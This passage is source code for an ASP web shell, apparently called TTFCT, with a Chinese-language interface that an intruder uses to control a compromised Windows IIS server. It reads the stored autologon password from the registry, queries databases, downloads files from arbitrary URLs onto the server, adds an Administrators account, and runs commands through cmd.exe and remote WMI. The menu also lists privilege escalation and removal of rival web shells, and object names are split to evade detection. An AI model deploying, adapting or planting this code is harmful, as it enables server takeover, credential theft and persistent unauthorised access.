intValue = intValue - 64
strAtt = Replace(strAtt, "{$alias}", "checked")
End If
If intValue >= 32 Then
intValue = intValue - 32
strAtt = Replace(strAtt, "{$archive}", "checked")
End If
If intValue >= 16 Then
intValue = intValue - 16
strAtt = Replace(strAtt, "{$directory}", "checked")
End If
If intValue >= 8 Then
intValue = intValue - 8
strAtt = Replace(strAtt, "{$volume}", "checked")
End If
If intValue >= 4 Then
intValue = intValue - 4
strAtt = Replace(strAtt, "{$system}", "checked")
End If
If intValue >= 2 Then
intValue = intValue - 2
strAtt = Replace(strAtt, "{$hidden}", "checked")
End If
If intValue >= 1 Then
intValue = intValue - 1
strAtt = Replace(strAtt, "{$readonly}", "checked")
End If
getAttributes = strAtt
End Function
Sub PageInfoAboutSrv()
Dim theAct
theAct = Request("theAct")
showTitle("服务器相关数据")
Select Case theAct
Case ""
getSrvInfo()
getSrvDrvInfo()
getSiteRootInfo()
getTerminalInfo()
Case "getSrvInfo"
getSrvInfo()
Case "getSrvDrvInfo"
getSrvDrvInfo()
Case "getSiteRootInfo"
getSiteRootInfo()
Case "getTerminalInfo"
getTerminalInfo()
End Select
echo "<hr/>"
End Sub
Sub getSrvInfo()
If isDebugMode = False Then
On Error Resume Next
End If
Dim i, sa, objWshSysEnv, aryExEnvList, strExEnvList, intCpuNum, strCpuInfo, strOS
Set sa = Server.CreateObject("She"&T&"ll.Appl"&T&"ication")
strExEnvList = "SystemRoot$WinDir$ComSpec$TEMP$TMP$NUMBER_OF_PROCESSORS$OS$Os2LibPath$Path$PATHEXT$PROCESSOR_ARCHITECTURE$" & _
"PROCESSOR_IDENTIFIER$PROCESSOR_LEVEL$PROCESSOR_REVISION"
aryExEnvList = Split(strExEnvList, "$")
Set objWshSysEnv = wsX.Environment("SYSTEM")
chkErr(Err)
intCpuNum = Request.ServerVariables("NUMBER_OF_PROCESSORS")
If IsNull(intCpuNum) Or intCpuNum = "" Then
intCpuNum = objWshSysEnv("NUMBER_OF_PROCESSORS")
End If
strOS = Request.ServerVariables("OS")
If IsNull(strOS) Or strOS = "" Then
strOS = objWshSysEnv("OS")
strOs = strOs & "(有可能是 Windows2003 哦)"
End If
strCpuInfo = objWshSysEnv("PROCESSOR_IDENTIFIER")
echo "<a href=javascript:showHideMe(srvInf);>服务器相关参数:</a>"
echo "<ol id=srvInf><hr/>"
echo "<li>服务器名: " & Request.ServerVariables("SERVER_NAME") & "</li>"
echo "<li>服务器IP: " & Request.ServerVariables("LOCAL_ADDR") & "</li>"
echo "<li>服务端口: " & Request.ServerVariables("SERVER_PORT") & "</li>"
echo "<li>服务器内存: " & getTheSize(sa.GetSystemInformation("PhysicalMemoryInstalled")) & "</li>"
echo "<li>服务器时间: " & Now & "</li>"
echo "<li>服务器软件: " & Request.ServerVariables("SERVER_SOFTWARE") & "</li>"
echo "<li>脚本超时时间: " & Server.ScriptTimeout & "</li>"
echo "<li>服务器CPU数量: " & intCpuNum & "</li>"
echo "<li>服务器CPU详情: " & strCpuInfo & "</li>"
echo "<li>服务器操作系统: " & strOS & "</li>"
echo "<li>服务器解译引擎: " & ScriptEngine & "/" & ScriptEngineMajorVersion & "." & ScriptEngineMinorVersion & "." & ScriptEngineBuildVersion & "</li>"
echo "<li>本文件实际路径: " & Request.ServerVariables("PATH_TRANzxzgcnATED") & "</li>"
echo "<hr/></ol>"
echo "<br/><a href=javascript:showHideMe(srvEnvInf);>服务器相关参数:</a>"
echo "<ol id=srvEnvInf><hr/>"
For i = 0 To UBound(aryExEnvList)
echo "<li>" & aryExEnvList(i) & ": " & wsX.ExpandEnvironmentStrings("%" & aryExEnvList(i) & "%") & "</li>"
Next
echo "<hr/></ol>"
Set sa = Nothing
Set objWshSysEnv = Nothing
End Sub
Sub getSrvDrvInfo()
If isDebugMode = False Then
On Error Resume Next
End If
Dim objTheDrive
echo "<br/><a href=javascript:showHideMe(srvDriveInf);>服务器磁盘信息:</a>"
echo "<ol id=srvDriveInf><hr/>"
echo "<div id='fsoDriveList'>"
echo "<span>盘符</span><span>类型</span><span>卷标</span><span>文件系统</span><span>可用空间</span><span>总空间</span><br/>"
For Each objTheDrive In fsoX.Drives
echo "<span>" & objTheDrive.DriveLetter & "</span>"
echo "<span>" & getDriveType(objTheDrive.DriveType) & "</span>"
If UCase(objTheDrive.DriveLetter) = "A" Then
echo "<br/>"
Else
echo "<span>" & objTheDrive.VolumeName & "</span>"
echo "<span>" & objTheDrive.FileSystem & "</span>"
echo "<span>" & getTheSize(objTheDrive.FreeSpace) & "</span>"
echo "<span>" & getTheSize(objTheDrive.TotalSize) & "</span><br/>"
End If
If Err Then
Err.Clear
echo "<br/>"
End If
Next
echo "</div><hr/></ol>"
Set objTheDrive = Nothing
End Sub
Sub getSiteRootInfo()
If isDebugMode = False Then
On Error Resume Next
End If
Dim objTheFolder
Set objTheFolder = fsoX.GetFolder(Server.MapPath("/"))
echo "<br/><a href=javascript:showHideMe(siteRootInfo);>站点根目录信息:</a>"
echo "<ol id=siteRootInfo><hr/>"
echo "<li>物理路径: " & Server.MapPath("/") & "</li>"
echo "<li>当前大小: " & getTheSize(objTheFolder.Size) & "</li>"
echo "<li>文件数: " & objTheFolder.Files.Count & "</li>"
echo "<li>文件夹数: " & objTheFolder.SubFolders.Count & "</li>"
echo "<li>创建日期: " & objTheFolder.DateCreated & "</li>"
echo "<li>最后访问日期: " & objTheFolder.DateLastAccessed & "</li>"
echo "</ol>"
End Sub
Sub getTerminalInfo()
If isDebugMode = False Then
On Error Resume Next
End If
Dim terminalPortPath, terminalPortKey, termPort
Dim autoLoginPath, autoLoginUserKey, autoLoginPassKey
Dim isAutoLoginEnable, autoLoginEnableKey, autoLoginUsername, autoLoginPassword
terminalPortPath = "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\"
terminalPortKey = "PortNumber"
termPort = wsX.RegRead(terminalPortPath & terminalPortKey)
echo "终端服务端口及自动登录信息<hr/><ol>"
If termPort = "" Or Err.Number <> 0 Then
echo "无法得到终端服务端口, 请检查权限是否已经受到限制.<br/>"
Else
echo "当前终端服务端口: " & termPort & "<br/>"
End If
autoLoginPath = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\"
autoLoginEnableKey = "AutoAdminLogon"
autoLoginUserKey = "DefaultUserName"
autoLoginPassKey = "DefaultPassword"
isAutoLoginEnable = wsX.RegRead(autoLoginPath & autoLoginEnableKey)
If isAutoLoginEnable = 0 Then
echo "系统自动登录功能未开启<br/>"
Else
autoLoginUsername = wsX.RegRead(autoLoginPath & autoLoginUserKey)
echo "自动登录的系统帐户: " & autoLoginUsername & "<br>"
autoLoginPassword = wsX.RegRead(autoLoginPath & autoLoginPassKey)
If Err Then
Err.Clear
echo "False"
End If
echo "自动登录的帐户密码: " & autoLoginPassword & "<br>"
End If
echo "</ol>"
End Sub
Sub PageLogin()
Dim theAct, passWord
theAct = Request("theAct")
passWord = Request("userPassword")
showTitle("管理登录")
If theAct = "chkLogin" Then
If passWord = userPassword Then
Session(m & "userPassword") = passWord
redirectTo("?zxzgcn=PageList")
Else
echo "<script language=javascript>alert('不要乱来哦');history.back();</script>"
End If
End If
echo "<style>body{margin:8;text-align:center;}</style>"
echo "TTFCT全功能版<hr/>"
echo "<body onload=document.forms[0].userPassword.focus();>"
echo "<form method=post onsubmit=this.Submit.disabled=true;>"
echo "<input name=userPassword class=input type=password size=30> "
echo "<input type=hidden name=theAct value=chkLogin>"
echo "<input type=submit name=Submit value=""" & HtmlEncode(myName) & """ class=input>"
echo "<hr/>"
echo "<SCRIPT type='text/javascript' language='javascript' src='[url]http://xzxzgcnt.alexa.com/site_stats/js/t/c?url=[/url]'></SCRIPT>"
echo "</form>"
echo "<body>"
End Sub
Sub pageMsDataBase()
Dim theAct, sqlStr
theAct = Request("theAct")
sqlStr = Request("sqlStr")
showTitle("mdb+mssql数据库操作页")
If sqlStr = "" Then
If Session(m & "sqlStr") = "" Then
sqlStr = "e:\zxzgcnTop.mdb或sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs;"
Else
sqlStr = Session(m & "sqlStr")
End If
End If
Session(m & "sqlStr") = sqlStr
echo "<style>body{margin:8;}</style>"
echo "<form method=post action='?zxzgcn=MsDataBase&theAct=showTables' onSubmit='this.Submit.disabled=true;'>"
echo "<a href='?zxzgcn=MsDataBase'>mdb+mssql数据库操作</a><br/>"
echo "<input name=sqlStr type=text id=sqlStr value=""" & sqlStr & """ size=60 style='width:80%;'>"
echo "<input name=theAct type=hidden value=showTables><br/>"
echo "<input type=Submit name=Submit value=' 提交 '>"
echo "<input type=button name=Submit2 value=' 插入 ' onclick=""if(confirm('这里是在ACESS数据里插入ASP\n默认密码是" & clientPassword & "\n插入后可以使用的前提是\n数据库是asp后缀, 并且没有错乱asp代码\n确认操作吗?')){location.href='?zxzgcn=MsDataBase&theAct=inject&sqlStr='+this.form.sqlStr.value;this.disabled=true;}"">"
echo "<input type=button value=' 示例 ' onclick=""this.form.sqlStr.value='e:\\zxzgcnTop.mdb或sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs;';"">"
echo "</form>"
echo "<hr/>注: 插入只针对ACCESS操作, 要浏览ACCESS在表单中的写法是""d:\bbs.mdb"", SQL据库写法是""sql:连接字符串"", 不要忘写sql:。<hr/>"
Select Case theAct
Case "showTables"
showTables()
Case "query"
showQuery()
Case "inject"
accessInject()
End Select
echo ""
End Sub
Sub showTables()
If isDebugMode = False Then
On Error Resume Next
End If
Dim conn, sqlStr, rsTable, rsColumn, connStr, tablesStr
sqlStr = Request("sqlStr")
If LCase(Left(sqlStr, 4)) = "sql:" Then
connStr = Mid(sqlStr, 5)
Else
connStr = "Provider=Microsoft.Jet.Oledb.4.0;Data Source=" & sqlStr
End If
Set conn = Server.CreateObject("ADO"&T&"DB.Conne"&T&"ction")
conn.Open connStr
chkErr(Err)
tablesStr = getTableList(conn, sqlStr, rsTable)
echo "<a href=""?zxzgcn=MsDataBase&theAct=showTables&sqlStr=" & UrlEncode(sqlStr) & """>数据库表结构查看:</a><br/>"
echo tablesStr & "<hr/>"
echo "<a href=""?zxzgcn=MsDataBase&theAct=query&sqlStr=" & UrlEncode(sqlStr) & """>转到SQL命令执行</a><hr/>"
Do Until rsTable.Eof
Set rsColumn = conn.OpenSchema(4, Array(Empty, Empty, rsTable("Table_Name").value))
echo "<table border=0 cellpadding=0 cellspacing=0><tr><td height=22 colspan=6><b>" & rsTable("Table_Name") & "</b></td>"
echo "</tr><tr><td colspan=6><hr/></td></tr><tr align=center>"
echo "<td>字段名</td><td>类型</td><td>大小</td><td>精度</td><td>允许为空</td><td>默认值</td></tr>"
echo "<tr><td colspan=6><hr/></td></tr>"
Do Until rsColumn.Eof
echo "<tr align=center>"
echo "<td align=Left> " & rsColumn("Column_Name") & "</td>"
echo "<td width=80>" & getDataType(rsColumn("Data_Type")) & "</td>"
echo "<td width=70>" & rsColumn("Character_Maximum_Length") & "</td>"
echo "<td width=70>" & rsColumn("Numeric_Precision") & "</td>"
echo "<td width=70>" & rsColumn("Is_Nullable") & "</td>"
echo "<td width=80>" & rsColumn("Column_Default") & "</td>"
echo "</tr>"
rsColumn.MoveNext
Loop
echo "<tr><td colspan=6><hr/></td></tr></table>"
rsTable.MoveNext
Loop
echo "<hr/>"
conn.Close
Set conn = Nothing
Set rsTable = Nothing
Set rsColumn = Nothing
End Sub
Sub showQuery()
If isDebugMode = False Then
On Error Resume Next
End If
Dim i, j, rs, sql, page, conn, sqlStr, connStr, rsTable, tablesStr, theTable
sql = Request("sql")
page = Request("page")
sqlStr = Request("sqlStr")
theTable = Request("theTable")
If Not IsNumeric(page) or page = "" Then
page = 1
End If
If sql = "" And theTable <> "" Then
sql = "Select top " & dbSelectNumber & " * from [" & theTable & "]"
End If
If LCase(Left(sqlStr, 4)) = "sql:" Then
connStr = Mid(sqlStr, 5)
Else
connStr = "Provider=Microsoft.Jet.Oledb.4.0;Data Source=" & sqlStr
End If
Set rs = Server.CreateObject("Adodb.RecordSet")
Set conn = Server.CreateObject("ADO"&T&"DB.Conne"&T&"ction")
conn.Open connStr
chkErr(Err)
tablesStr = getTableList(conn, sqlStr, rsTable)
echo "<a href=""?zxzgcn=MsDataBase&theAct=showTables&sqlStr=" & UrlEncode(sqlStr) & """>数据库表结构查看:</a><br/>"
echo tablesStr & "<hr/>"
echo "<a href=?zxzgcn=MsDataBase&theAct=query&sqlStr=" & UrlEncode(sqlStr) & "&sql=" & UrlEncode(sql) & ">SQL命令执行及查看</a>"
echo "<br/><form method=post action=""?zxzgcn=MsDataBase&theAct=query&sqlStr=" & UrlEncode(sqlStr) & """>"
echo "<input name=sql type=text id=sql value=""" & HtmlEncode(sql) & """ size=60>"
echo "<input type=Submit name=Submit4 value=执行查询><hr/>"
If sql <> "" And Left(LCase(sql), 7) = "select " Then
rs.Open sql, conn, 1, 1
chkErr(Err)
rs.PageSize = 20
If Not rs.Eof Then
rs.AbsolutePage = page
End If
If rs.Fields.Count>0 Then
echo "<br><table border=""1"" cellpadding=""0"" cellspacing=""0"" width=""98%"">"
echo "<tr>"
echo "<td height=""22"" align=""center"" class=""tr"" colspan=""" & rs.Fields.Count & """>SQL操作 - 执行结果</td>"
echo "</tr>"
echo "<tr>"
For j = 0 To rs.Fields.Count-1
echo "<td height=""22"" align=""center"" class=""td""> " & rs.Fields(j).Name & " </td>"
Next
For i = 1 To 20
If rs.Eof Then
Exit For
End If
echo "</tr>"
echo "<tr valign=top>"
For j = 0 To rs.Fields.Count-1
echo "<td height=""22"" align=""center"">" & HtmlEncode(fixNull(rs(j))) & "</td>"
Next
echo "</tr>"
rs.MoveNext
Next
End If
echo "<tr>"
echo "<td height=""22"" align=""center"" class=""td"" colspan=""" & rs.Fields.Count & """>"
For i = 1 To rs.PageCount
echo Replace("<a href=""?zxzgcn=MsDataBase&theAct=query&sqlStr=" & UrlEncode(sqlStr) & "&sql=" & UrlEncode(sql) & "&page=" & i & """><font {$font" & i & "}>" & i & "</font></a> ", "{$font" & page & "}", "class=warningColor")
Next
echo "</td></tr></table>"
rs.Close
Else
If sql <> "" Then
conn.Execute(sql)
chkErr(Err)
echo "<center><br>执行完毕!</center>"
End If
End If
echo "</form><hr/>"
conn.Close
Set rs = Nothing
Set conn = Nothing
Set rsTable = Nothing
End Sub
Function getDataType(typeId)
Select Case typeId
Case 130
getDataType = "文本"
Case 2
getDataType = "整型"
Case 3
getDataType = "长整型"
Case 7
getDataType = "日期/时间"
Case 5
getDataType = "双精度型"
Case 11
getDataType = "是/否"
Case 128
getDataType = "OLE 对象"
Case Else
getDataType = typeId
End Select
End Function
Sub accessInject()
echo "<script language=""javascript"">alert('not available');history.back();</script>"
Set conn = Nothing
End Sub
Function getTableList(conn, sqlStr, rsTable)
Set rsTable = conn.OpenSchema(20, Array(Empty, Empty, Empty, "table"))
Do Until rsTable.Eof
getTableList = getTableList & "<a href=""?zxzgcn=MsDataBase&theAct=query&sqlStr=" & UrlEncode(sqlStr) & "&theTable=" & UrlEncode(rsTable("Table_Name")) & """>[" & rsTable("Table_Name") & "]</a> "
rsTable.MoveNext
Loop
rsTable.MoveFirst
End Function
Sub PageObjOnSrv()
Dim i, objTmp, txtObjInfo, strObjectList, strDscList
txtObjInfo = Trim(Request("txtObjInfo"))
strObjectList = "MSWC.AdRotator,MSWC.BrowserType,MSWC.NextLink,MSWC.Tools,MSWC.Status,MSWC.Counters,IISSample.ContentRotator," & _
"IISSample.PageCounter,MSWC.PermissionChecker,ADO"&T&"DB.Conne"&T&"ction,SoftArtisans.FileUp,SoftArtisans.FileManager,LyfUpload.UploadFile," & _
"Persits.Upload.1,W3.Upload,JMail.SmtpMail,CDONTS.NewMail,Persits.MailSender,SMTPsvg.Mailer,DkQmail.Qmail,Geocel.Mailer," & _
"IISmail.Iismail.1,SmtpMail.SmtpMail.1,SoftArtisans.ImageGen,W3Image.Image," & _
"Scripting.FileSystemObject,ad"&e&"odb.st"&e&"ream,She"&T&"ll.Appl"&T&"ication,WScri"&T&"pt.She"&T&"ll,Wscript.Network"
strDscList = "广告轮换,浏览器信息,内容链接库,,,计数器,内容轮显,,权限检测,ADO 数据对象,SA-FileUp 文件上传,SoftArtisans 文件管理," & _
"刘云峰的文件上传组件,ASPUpload 文件上传,Dimac 文件上传,Dimac JMail 邮件收发,虚拟 SMTP 发信,ASPemail 发信,ASPmail 发信,dkQmail 发信," & _
"Geocel 发信,IISmail 发信,SmtpMail 发信,SA 的图像读写,Dimac 的图像读写组件," & _
"FSO,Stream 流,,,"
aryObjectList = Split(strObjectList, ",")
aryDscList = Split(strDscList, ",")
showTitle("服务器组件支持情况检测")
echo "其他组件支持情况检测<br/>"
echo "在下面的输入框中输入你要检测的组件的ProgId或ClassId。<br/>"
echo "<form method=post>"
echo "<input name=txtObjInfo size=30 value=""" & txtObjInfo & """><input name=theAct type=submit value=我要检测>"
echo "</form>"
If Request("theAct") = "我要检测" And txtObjInfo <> "" Then
Call getObjInfo(txtObjInfo, "")
End If
echo "<hr/>"
echo "<lu>组件名称 ┆ 支持及其它"
For i = 0 To UBound(aryDscList)
Call getObjInfo(aryObjectList(i), aryDscList(i))
Next
echo "</lu><hr/>"
End Sub
Sub getObjInfo(strObjInfo, strDscInfo)
Dim objTmp
If isDebugMode = False Then
On Error Resume Next
End If
echo "<li> " & strObjInfo
If strDscInfo <> "" Then
echo " (" & strDscInfo & "组件)"
End If
echo " ┆ "
Set objTmp = Server.CreateObject(strObjInfo)
If Err <> -2147221005 Then
echo "√ "
echo "Version: " & objTmp.Version & "; "
echo "About: " & objTmp.About
Else
echo "×"
End If
echo "</li>"
If Err Then
Err.Clear
End If
Set objTmp = Nothing
End Sub
Sub PageOtherTools()
Dim theAct
theAct = Request("theAct")
showTitle("一些零碎的小东西")
Select Case theAct
Case "downFromUrl"
downFromUrl()
Response.End
Case "addUser"
AddUser Request("userName"), Request("passWord")
Response.End
Case "readReg"
readReg()
Response.End
End Select
echo "数制转换:<hr/>"
echo "<input name=text1 value=字符和数字转10和16进制 size=25 id=text9>"
echo "<input type=button onclick=main(); value=给我转>"
echo "<input value=16进制转10进制和字符 size=25 id=vars>"
echo "<input type=button onClick=main2(); value=给我转>"
echo "<hr/>"
echo "下载到服务器:<hr/>"
echo "<form method=post target=_blank>"
echo "<input name=theUrl value='http://' size=80><input type=submit value=' 下载 '><br/>"
echo "<input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & """ size=80>"
echo "<input type=checkbox name=overWrite value=2>存在覆盖"
echo "<input type=hidden value=downFromUrl name=theAct>"
echo "</form>"
echo "<hr/>"
echo "文件编辑:<hr/>"
echo "<form method=post action='?' target=_blank>"
echo "<input size=80 name=thePath value=""" & HtmlEncode(Request.ServerVariables("PATH_TRANzxzgcnATED")) & """>"
echo "<input type=hidden value=showEdit name=theAct>"
echo "<select name=zxzgcn><option value=AppFileExplorer>用Stream</option><option value=FsoFileExplorer>用FSO</option></select>"
echo "<input type=submit value=' 打开 '>"
echo "</form><hr/>"
echo "管理帐号添加(成功率极低):<hr/>"
echo "<form method=post target=_blank>"
echo "<input type=hidden value=addUser name=theAct>"
echo "<input name=userName value='zxzgcnTop' size=39>"
echo "<input name=passWord type=password value='zxzgcnTop' size=39>"
echo "<input type=submit value=' 添加 '>"
echo "</form><hr/>"
echo "注册表键值读取(<a href=javascript:showHideMe(regeditInfo);>资料</a>):<hr/>"
echo "<form method=post target=_blank>"
echo "<input type=hidden value=readReg name=theAct>"
echo "<input name=thePath value='HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName' size=80>"
echo "<input type=submit value=' 读取 '>"
echo "<span id=regeditInfo style='display:none;'><hr/>"
echo "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\Dont-DisplayLastUserName,REG_SZ,1 {不显示上次登录用户}<br/>"
echo "HKLM\SYSTEM\CurrentControlSet\Control\Lsa\restrictanonymous,REG_DWORD,0 {0=缺省,1=匿名用户无法列举本机用户列表,2=匿名用户无法连接本机IPC$共享}<br/>"
echo "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\AutoShareServer,REG_DWORD,0 {禁止默认共享}<br/>"
echo "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\EnableSharedNetDrives,REG_SZ,0 {关闭网络共享}<br/>"
echo "HKLM\SYSTEM\currentControlSet\Services\Tcpip\Parameters\EnableSecurityFilters,REG_DWORD,1 {启用TCP/IP筛选(所有试配器)}<br/>"
echo "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\IPEnableRouter,REG_DWORD,1 {允许IP路由}<br/>"
echo "-------以下似乎要看绑定的网卡,不知道是否准确---------<br/>"
echo "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\DefaultGateway,REG_MUTI_SZ {默认网关}<br/>"
echo "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\NameServer {首DNS}<br/>"
echo "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\TCPAllowedPorts {允许的TCP/IP端口}<br/>"
echo "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\UDPAllowedPorts {允许的UDP端口}<br/>"
echo "-----------OVER--------------------<br/>"
echo "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Enum\Count {共几块活动网卡}<br/>"
echo "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Linkage\Bind {当前网卡的序列(把上面的替换)}<br/>"
echo "==========================================================<br/>以上资料由kEvin1986提供"
echo "</span>"
echo "</form><hr/>"
echo "<script language=vbs>" & vbNewLine
echo "sub main()" & vbNewLine
echo "base=document.all.text9.value" & vbNewLine
echo "If IsNumeric(base) Then" & vbNewLine
echo "cc=hex(cstr(base))" & vbNewLine
echo "alert(""10进制为""&base)" & vbNewLine
echo "alert(""16进制为""&cc)" & vbNewLine
echo "exit sub" & vbNewLine
echo "end if" & vbNewLine
echo "aa=asc(cstr(base))" & vbNewLine
echo "bb=hex(aa)" & vbNewLine
echo "alert(""10进制为""&aa)" & vbNewLine
echo "alert(""16进制为""&bb)" & vbNewLine
echo "end sub" & vbNewLine
echo "sub main2()" & vbNewLine
echo "If document.all.vars.value<>"""" Then" & vbNewLine
echo "Dim nums,tmp,tmpstr,i" & vbNewLine
echo "nums=document.all.vars.value" & vbNewLine
echo "nums_len=Len(nums)" & vbNewLine
echo "For i=1 To nums_len" & vbNewLine
echo "tmp=Mid(nums,i,1)" & vbNewLine
echo "If IsNumeric(tmp) Then" & vbNewLine
echo "tmp=tmp * 16 * (16^(nums_len-i-1))" & vbNewLine
echo "Else" & vbNewLine
echo "If ASC(UCase(tmp))<65 Or ASC(UCase(tmp))>70 Then" & vbNewLine
echo "alert(""你输入的数值中有非法字符,16进制数只包括1~9及a~f之间的字符,请重新输入。"")" & vbNewLine
echo "exit sub" & vbNewLine
echo "End If" & vbNewLine
echo "tmp=(ASC(UCase(tmp))-55) * (16^(nums_len-i))" & vbNewLine
echo "End If" & vbNewLine
echo "tmpstr=tmpstr+tmp" & vbNewLine
echo "Next" & vbNewLine
echo "alert(""转换的10进制为:""&tmpstr&""其字符值为:""&chr(tmpstr))" & vbNewLine
echo "End If" & vbNewLine
echo "end sub" & vbNewLine
echo "</script>" & vbNewLine
echo ""
End Sub
Sub downFromUrl()
If isDebugMode = False Then
On Error Resume Next
End If
Dim Http, theUrl, thePath, stream, fileName, overWrite
theUrl = Request("theUrl")
thePath = Request("thePath")
overWrite = Request("overWrite")
Set stream = Server.CreateObject("ad"&e&"odb.st"&e&"ream")
Set Http = Server.CreateObject("MSXML2.XMLHTTP")
If overWrite <> 2 Then
overWrite = 1
End If
Http.Open "GET", theUrl, False
Http.Send()
If Http.ReadyState <> 4 Then
Exit Sub
End If
With stream
.Type = 1
.Mode = 3
.Open
.Write Http.ResponseBody
.Position = 0
.SaveToFile thePath, overWrite
If Err.Number = 3004 Then
Err.Clear
fileName = Split(theUrl, "/")(UBound(Split(theUrl, "/")))
If fileName = "" Then
fileName = "index.htm.txt"
End If
thePath = thePath & "\" & fileName
.SaveToFile thePath, overWrite
End If
.Close
End With
chkErr(Err)
alertThenClose("文件 " & Replace(thePath, "\", "\\") & " 下载成功!")
Set Http = Nothing
Set Stream = Nothing
End Sub
Sub AddUser(strUser, strPassword)
If isDebugMode = False Then
On Error Resume Next
End If
Dim computer, theUser, theGroup
Set computer = Getobject("WinNT://.")
Set theGroup = GetObject("WinNT://./Administrators,group")
Set theUser = computer.Create("User", strUser)
theUser.SetPassword(strPassword)
chkErr(Err)
theUser.SetInfo
chkErr(Err)
theGroup.Add theUser
chkErr(Err)
Set theUser = Nothing
Set computer = Nothing
Set theGroup = Nothing
echo getUserInfo(strUser)
End Sub
Sub readReg()
If isDebugMode = False Then
On Error Resume Next
End If
Dim i, thePath, theArray
thePath = Request("thePath")
' echo thePath & "<br/>"
theArray = wsX.RegRead(thePath)
If IsArray(theArray) Then
For i = 0 To UBound(theArray)
echo "<li>" & theArray(i)
Next
Else
echo "<li>" & theArray
End If
chkErr(Err)
End Sub
Sub mycom()
echo "<form name=""form1"" method=""post"" action=""?zxzgcn=mycom"">"
echo " 远程执行命令"
echo "<input name=""ok"" type=""text"" id=""ok"" value="""192.168.2.1","root/cimv2","administrator","xiaolu""" size=""70"">"
echo " <input type=""submit"" name=""Submit"" value=""提交"">"
echo "</form>"
if request("ok")<>"" then
set ww=server.createobject("wbemscripting.swbemlocator")
set cc=ww.connectserver(request("ok"))
set ss=cc.get("Win32_ProcessStartup")
Set oC=ss.SpawnInstance_
oC.ShowWindow=12
Set pp=cc.get("Win32_Process")
Response.Write pp.create("net user",null,oC,intProcessID)
Response.Write "<br>"&intProcessID
Response.end
end if
end sub
Sub PageList()
showTitle("功能模块列表")
echo "<base target=_blank>"
echo "TTFCT增强版<hr/>"
echo "<ol><li><a href='?zxzgcn=ServiceList'>系统服务信息</a></li>"
echo "<br/>"
echo "<li><a href='?zxzgcn=infoAboutSrv'>服务器相关数据</a><br/>("
echo "<a href='?zxzgcn=infoAboutSrv&theAct=getSrvInfo'>系统参数</a>,"
echo "<a href='?zxzgcn=infoAboutSrv&theAct=getSrvDrvInfo'>系统磁盘</a>,"
echo "<a href='?zxzgcn=infoAboutSrv&theAct=getSiteRootInfo'>站点文件夹</a>,"
echo "<a href='?zxzgcn=infoAboutSrv&theAct=getTerminalInfo'>终端端口&自动登录</a>)</li>"
echo "<li><a href='?zxzgcn=objOnSrv'>服务器组件探针</a></li>"
echo "<li><a href='?zxzgcn=userList'>系统用户及用户组信息</a></li>"
echo "<li><a href='?zxzgcn=CSInfo'>客户端服务器交互信息</a></li>"
echo "<li><a href='?zxzgcn=WsCmdRun'>WScri"&T&"pt.She"&T&"ll程序运行器</a></li>"
echo "<li><a href='?zxzgcn=SaCmdRun'>She"&T&"ll.Appl"&T&"ication程序运行器</a></li>"
echo "<li><a href='?zxzgcn=FsoFileExplorer'>FSO文件浏览操作器</a></li>"
echo "<li><a href='?zxzgcn=AppFileExplorer'>She"&T&"ll.Appl"&T&"ication文件浏览操作器</a></li>"
echo "<li><a href='?ado=ado'>ADO.Stream文件浏览操作器</a></li>"
echo "<li><a href='?zxzgcn=MsDataBase'>微软数据库查看/操作器</a></li>"
echo "<li><a href='?zxzgcn=PageAddToMdb'>文件夹打包/解开器</a></li>"
echo "<li><a href='?zxzgcn=TxtSearcher'>文本文件搜索器</a></li>"
echo "<li><a href='?zxzgcn=OtherTools'>一些零碎的小东西</a></li>"
echo "<li><a href='?sql=yes'>SqlRootKit 3.0</a></li>"
echo "<li><a href='?zxzgcn=mycom'>wmi远程执行命令</a></li>"
echo "<li><a href='?su=su'>SerV-U-ASP提权</a></li>"
echo "<li><a href='?kill=yes'>干掉非本人ASP木马</a></li>"
echo "</ol>"
echo "BY TTFCT<hr/>"
End Sub
Sub PageSaCmdRun()
If isDebugMode = False Then
On Error Resume Next
End If
Dim theFile, thePath, theAct, appPath, appName, appArgs
showTitle("She"&T&"ll.Appl"&T&"ication命令行操作")
theAct = Trim(Request("theAct"))
appPath = Trim(Request("appPath"))
thePath = Trim(Request("thePath"))
appName = Trim(Request("appName"))
appArgs = Trim(Request("appArgs"))
If theAct = "doAct" Then
If appName = "" Then
appName = "cmd.exe"
End If
If appPath <> "" And Right(appPath, 1) <> "\" Then
appPath = appPath & "\"
End If
If LCase(appName) = "cmd.exe" And appArgs <> "" Then
If LCase(Left(appArgs, 2)) <> "/c" Then
appArgs = "/c " & appArgs
End If
Else
If LCase(appName) = "cmd.exe" And appArgs = "" Then
appArgs = "/c "
End If
End If
saX.ShellExecute appName, appArgs, appPath, "", 0
chkErr(Err)
End If
If theAct = "readResult" Then
Err.Clear
echo encode(streamLoadFromFile(aspPath))
If Err Then
Set theFile = fsoX.OpenTextFile(aspPath)
echo encode(theFile.ReadAll())
Set theFile = Nothing
End If
Response.End
End If
echo "<style>body{margin:8;border:none;background-color:buttonface;}</style>"
echo "<body onload=""document.forms[0].appArgs.focus();setTimeout('wzxzgcnoadIFrame();', 3900);"">"
echo "<form method=post onSubmit='this.Submit.disabled=true'>"
echo "<input type=hidden name=theAct value=doAct>"
echo "<input type=hidden name=aspPath value=""" & HtmlEncode(aspPath) & """>"
